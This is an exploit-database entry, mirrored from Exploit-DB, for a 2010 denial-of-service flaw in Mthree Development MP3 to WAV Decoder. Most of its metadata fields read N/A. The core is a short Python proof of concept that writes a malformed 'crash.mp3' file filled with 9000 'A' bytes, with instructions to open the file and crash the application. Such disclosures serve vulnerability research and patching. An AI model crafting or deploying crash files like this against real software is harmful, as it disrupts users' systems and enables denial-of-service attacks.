header-logo
Suggest Exploit
vendor:
MP3 to WAV Decoder
by:
Oh Yaw Theng
N/A
CVSS
N/A
Denial of Service
N/A
CWE
Product Name: MP3 to WAV Decoder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 2
2010

Mthree Development MP3 to WAV Decoder (.mp3) DoS

Mthree Development MP3 to WAV Decoder is vulnerable to a denial of service attack when a malicious .mp3 file is opened using Mthree. When the malicious file is double clicked, the application crashes.

Mitigation:

N/A
Source

Exploit-DB raw data:

# Exploit Title: Mthree Development MP3 to WAV Decoder (.mp3) DoS
# Date: 10 / 8 / 2010
# Author: Oh Yaw Theng
# Credit : ZAC003(4m!n) 
# Software Link: http://www.mthreedev.com/setupmp3towav.exe
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : Create the malicious .mp3 file , open up using Mthree , after that double click on the file .. Boom ! DEADBEEF !

#!/usr/bin/python

filename = "crash.mp3"

junk = "\x41" * 9000

exploit = junk

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()